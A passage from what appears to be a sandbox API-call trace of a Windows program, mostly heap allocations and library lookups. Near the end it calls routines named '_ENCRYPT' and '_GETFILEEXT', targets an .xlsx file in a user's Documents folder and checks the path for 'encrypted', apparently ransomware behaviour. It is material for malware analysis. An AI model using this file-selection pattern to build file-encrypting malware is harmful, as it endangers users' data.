(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.726] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.728] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.728] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.729] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.730] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0032.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.730] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.730] CloseHandle (hObject=0x140) returned 1 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.730] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.731] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.731] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.731] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.731] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.731] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.731] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x20ab7280, ftLastWriteTime.dwHighDateTime=0x1d552db, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0x7c20c0 [0032.732] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x20ab7280, ftLastWriteTime.dwHighDateTime=0x1d552db, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0x7c20c0 [0032.732] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS 